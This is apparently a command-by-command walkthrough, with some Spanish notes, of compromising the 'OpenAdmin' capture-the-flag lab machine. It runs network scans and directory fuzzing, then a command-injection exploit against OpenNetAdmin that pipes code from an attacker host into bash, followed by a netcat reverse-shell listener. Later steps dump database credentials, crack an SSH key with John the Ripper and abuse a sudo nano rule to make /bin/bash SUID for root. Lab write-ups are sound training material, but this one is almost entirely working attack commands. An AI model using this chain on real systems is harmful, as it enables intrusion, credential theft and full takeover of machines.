nmap -A -p- -oA openadmin 10.129.247.237 --min-rate=10000 --script=vuln --script-timeout=15 -v
nmap -sC -sV -O -p- -oA openadmin 10.129.247.237
nmap -sU -O -p- -oA openadmin-udp 10.129.247.237
nikto -h 10.129.247.237:80
nmap -sCV -p80,443 10.129.247.237 -oN targeted
whatweb http://10.129.247.237
wfuzz -c -t 200 --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.129.247.237/FUZZ
http://10.129.247.237/artwork
http://10.129.247.237/music y le damos click a login
searchsploit poennetadmin
searchsploit -m 47691
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";curl 10.10.14.92|bash;echo \"END\"&xajaxargs[]=ping" "http:10.129.247.237/ona"
python3 -m http.server 80
nc -lvnp 443
find \-name user.txt 2>/dev/null
cd /opt/ona/www
find \-type f 2>/dev/null | grep "config"
cat ./local/config/database_settings.inc.php
credenciales jimmy:n1nj4W4rri)R!
su jimmy
cat main.php
curl localhost:52846/main.php
Copiamos la llave y lo ponemos en id_rsa
/usr/share/john/ssh2john.py id_rsa
/usr/share/john/ssh2john.py id_rsa > hash
credenciales joanna:bloodninjas
john --wordlist=/usr/share/wordlists/rockyou.txt hash
chmod 600 id_rsa
ssh -i id_rsa joana@10.129.247.237
sudo -l
sudo -u root nano /opt/priv
Ctrl R + Ctrl X
En nano ejecutamos chmod 4755 /bin/bash
bash -p